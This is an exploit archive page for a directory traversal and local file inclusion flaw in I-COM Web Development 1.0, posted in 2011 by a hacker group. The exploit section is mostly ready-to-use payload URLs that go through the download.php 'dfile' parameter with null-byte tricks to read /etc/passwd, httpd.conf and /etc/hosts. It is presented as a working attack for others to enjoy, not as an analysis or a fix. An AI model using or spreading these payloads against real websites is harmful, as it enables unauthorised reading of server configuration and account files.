exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

I-COM 1.0 Local File Inclusion

I-COM 1.0 Local File Inclusion
Posted Feb 11, 2011
Authored by ThunDEr HeaD

I-COM Web Development version 1.0 suffers from a local file inclusion vulnerability.

tags | exploit, web, local, file inclusion
SHA-256 | 3a006ad97c3ef0050c6a7e4d34c2327b397876579036fb0ebd9d7b6ea6c47681

I-COM 1.0 Local File Inclusion

Change Mirror Download
> #########################################################################
>
> [+] Exploit Title : I-COM web Development LFI Vulnerability
> [~] Author : ThunDEr HeaD
> [~] Contact : thunderhead10@gmail.com
> [~] Date : 10-01-2011
> [~] HomePage : www.indishell.in
> [~] Verstion : 1.0
> [~] Tested on : Sites By I-com
> [~] Vulnerability Style : local file inclusion
> [~] Vulnerability Dir : Directory traversal
>
> #########################################################################
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ----== INDIAN CYBER ARMY ==----
>
> We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , Mahi
> eXeSoul , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI ,Jackh4xor , Th3 RDX
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> ---==[local file inclusion]==---
>
> [#] Go to the URL:
>
> http://server/i-com/download.php?dfile=
>
> [#] Apply these code(s) :
>
> ../../../../../../../../etc/passwd
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/passwd%00
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/httpd/conf/httpd.conf%00
>
> http://server/i-com/download.php?dfile=../../../../../../../../etc/hosts%00
>
>
> Enj0y! :D
>
>
> [#] DOne now time to rock \m/
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Bug discovered : 10 feb 2011
>
> finish(0);
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
> #End 0Day#

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close